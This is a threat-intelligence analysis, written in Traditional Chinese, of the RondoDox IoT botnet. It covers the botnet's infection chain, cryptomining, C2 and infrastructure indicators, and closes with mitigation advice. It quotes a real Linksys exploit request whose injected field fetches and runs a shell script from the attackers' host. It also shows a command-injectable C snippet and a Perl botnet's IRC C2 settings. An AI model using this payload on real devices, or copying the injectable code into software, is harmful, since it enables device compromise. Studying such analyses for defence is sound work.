2. RondoDox 殭屍網路概觀

RondoDox 殭屍網路以其能利用大量漏洞的卓越能力脫穎而出。最初於 2025 年 5 月被偵測到時，它很快便在誘捕系統(Honeypot)環境中展現出高流量，顯示其正在進行活躍且大規模的掃描與攻擊行為 ^[1] 。RondoDox 的主要特徵包括其實作了 174 種不同的漏洞利用，這對於此類威脅來說是異常高的數量，並且其攻擊嘗試次數能在單日達到 15,000 次的高峰。該殭屍網路的操作者也對漏洞揭露公告展現出敏銳的意識，經常在 CVE 公開之前就使用相關漏洞。隨著時間推移，RondoDox 已將其攻擊方法從廣泛的散彈槍方式，轉變為更具針對性的近期漏洞 ^[1] 。

3. 感染鏈與漏洞利用

RondoDox 的感染鏈是一個多階段的程序，目的在建立持續性並將主要的殭屍網路執行檔部署於受感染的裝置上。初始階段涉及掃描網際網路上存在漏洞的裝置，主要目標是遠端程式碼執行 (RCE) 漏洞。成功利用漏洞後，殭屍網路會擷取並執行一個 shell 指令稿。這個指令稿扮演關鍵角色，用於阻礙偵測、移除競爭對手的惡意軟體、識別可寫入的目錄，最後下載正確架構的特定執行檔 ^[1] 。

一個實際上觀察到的 RCE 漏洞利用範例，是針對 Linksys 裝置中未經認證的漏洞。該 payload 利用命令注入，從 RondoDox 的基礎架構下載並執行 shell 指令稿。以下 HTTP POST 請求展示了此技術 ^[1] ：

POST /tmUnblock.cgi HTTP/1.1
Host: <REDACTED>:8080
User-Agent: Mozilla/5.0 (rondo2012@atomicmail.io)
Connection: close
Accept: */*
Content-Type: application/x-www-form-urlencoded
Content-Length: 170
submit_button=&change_action=&action=&commit=0&ttcp_num=2&ttcp_size=2&ttcp_ip=-h `busybox wget -qO- http://<RONDO INFRA>/rondo.jbt.sh|sh`&StartEPI=1

在此 payload 中，`ttcp_ip` 參數存在命令注入攻擊漏洞，允許攻擊者執行任意命令。`busybox wget -qO- http://<RONDO INFRA>/rondo.jbt.sh|sh` 命令從 RondoDox 基礎架構下載 shell 指令稿 (`rondo.jbt.sh`)，並將其內容直接傳送給 `sh` 執行，避免寫入磁碟，從而增加鑑識分析的難度 ^[1] 。

這種攻擊方法與其他物聯網裝置的漏洞有相似之處，例如在 Planet Technology 工業網路設備中發現的漏洞。舉例來說，`dispatcher.cgi` 中的一個需要認證後的命令注入漏洞 (CVE-2025-46272)，因為缺乏對 `ip_URL` 參數的輸入清理，讓攻擊者得以注入命令 ^[3] 。下面顯示了有漏洞的程式碼片段 ^[3] ：

void trace_route() {
  char ip[64];
  snprintf(ip, sizeof(ip), "traceroute %s", get_param("ip_URL"));
  system(ip); // Vulnerable to command injection
}

這兩個例子都突顯了物聯網裝置漏洞利用的一個常見模式：利用網頁介面或 CGI 指令稿中的命令注入缺陷來獲得初始存取權，並執行惡意的 payload。RondoDox 殭屍網路更進一步，以 `<vuln>.<arch>` (例如 `linksys.mipsel`) 的格式將參數傳遞給主要執行檔，指出被利用的漏洞和目標架構。這使得殭屍網路能夠支援多種架構，包括 x86_64、i686、armv6l、mips 和 mipsel 等 ^[1] 。

4. 惡意軟體分析

雖然對 RondoDox 執行檔的詳細技術分析留待 Bitsight 未來發布，但初步觀察已能洞悉其功能。執行時，主要執行檔會執行幾項關鍵操作。它會對其名稱和參數進行基本健全性檢查，並採取反除錯和反分析措施以躲避偵測。接著，惡意軟體會嘗試透過檢查特定檔案位置並修改受害者的 crontabs 來移除其他威脅，確保其在受感染系統上的主導地位。隨後，它會建立持續性機制並部署 XMRig 加密貨幣挖礦程式，這表明其獲利策略已超越傳統殭屍網路活動，如分散式阻斷服務 (DDoS) 攻擊 ^[1] 。

RondoDox 殭屍網路與許多當代威脅一樣，都與 Mirai 殭屍網路有共同點，其開源程式碼影響了許多變種。然而，一個關鍵的區別在於 RondoDox 主要專注於執行 DDoS 攻擊，而 Mirai 則具備更廣泛的能力，包括掃描和利用其他系統 ^[1] 。XMRig 挖礦程式的出現暗示了一種雙重用途的運作模式，利用受感染的資源同時作為攻擊基礎架構和進行加密貨幣挖礦。

與命令與控制 (C2) 伺服器的通訊是殭屍網路運作的關鍵層面。RondoDox 連線到寫死的 C2，等待操作者的命令 ^[1] 。此 C2 機制是管理殭屍網路的基礎，讓殭屍網路控制者能向由大量受感染裝置組成的網路發送指令。相比之下，其他殭屍網路，例如使用 Perl 的殭屍網路，則利用網際網路即時中繼聊天 (Internet Relay Chat, IRC) 進行 C2 通訊。以下是一個來自此類 Perl 殭屍網路的設定範例，顯示了用於控制的 IRC 伺服器、連接埠和頻道 ^[2] ：

$server = 'ix1.undernet.org';
my $port = '6667';
my @channels = ("#rootbox", "#c0d3rs-TeaM");

這種利用 IRC 的 C2 機制雖然較舊，但為殭屍網路控制者提供了一種簡單有效的方式來同時管理大量的 bot ^[2] 。儘管初步報告中未完全詳述 RondoDox 殭屍網路的 C2 基礎架構，但它對於其協同攻擊和資源管理至關重要。

5. 基礎架構分析

支援 RondoDox 殭屍網路的基礎架構是一個為漏洞利用、散佈和管理而設計的複雜網路。Bitsight 識別出 RondoDox 活動的關鍵指標，例如在指令稿中使用名稱 “rondo”，以及在 User-Agent 標頭中使用特定的電子郵件地址 (例如 `rondo2012@atomicmail.io`、`bang2012@protonmail.com`) ^[1] 。這些指標讓研究人員得以繪製該殭屍網路的漏洞利用和代管基礎架構。

RondoDox 殭屍網路利用受感染的住宅 IP 作為代管基礎架構，這是殭屍網路常用的一種策略，用以掩蓋其來源並增加取締難度。該基礎架構表現出動態特性，活動曾觀察到中斷，且攻擊 IP 與代管 IP 之間不存在 1:1 的對應關係，這表明單一代管 IP 可以服務多個攻擊 IP ^[1] 。這種分散且具韌性的基礎架構，對於維持其運作和躲避偵測至關重要。

RondoDox 殭屍網路的感染與控制流程可以用下圖簡化表示：

此圖說明了從初始入侵到建立 C2 通訊，再到部署加密貨幣挖礦等額外惡意功能的多階段感染程序。利用受感染裝置作為殭屍網路基礎架構的一部分，凸顯了保護物聯網裝置和修補已知漏洞的重要性。

6. 結論

RondoDox 殭屍網路代表了網路安全領域中一個重大且持續演變的威脅，特別針對廣大且往往防護不足的物聯網裝置生態系統。它能夠利用大量漏洞、調整其漏洞攻擊方法，並維持具韌性的基礎架構，凸顯了現代殭屍網路操作的複雜性。多階段的感染程序，加上反分析技術以及部署加密貨幣挖礦程式，顯示其明確聚焦於對受感染資源的控制與獲利。與其他類型的殭屍網路（例如利用 IRC 的殭屍網路）相比較，突顯了兩者在 C2 機制上的共通性，以及 RondoDox 對其運作模式所做的獨特調整。

要有效緩解像 RondoDox 這類威脅，需要多管齊下的方法。這包括對暴露於網際網路的裝置進行嚴格的修補與漏洞管理、實施穩健的網路分段以隔離關鍵系統，以及持續監控可疑的網路流量與異常的裝置行為。此外，從分析 RondoDox 殭屍網路以及針對特定物聯網漏洞的研究中獲得的見解，強調了在物聯網裝置開發中採用「設計即安全」原則，以及在安全研究人員和組織之間主動分享威脅情資的迫切需求。持續研究殭屍網路的演變、漏洞利用技術以及 C2 基礎架構，對於制定有效的防禦措施和保護日益互聯的數位環境至關重要。

參考文獻

1. RondoDox Botnet: From Zero to 174 Exploited Vulnerabilities
2. 資安新利器：SSH LLM 誘捕系統揭露 botnet 手法
3. 駭客如何攻破WDRT-1202AC？漏洞全解析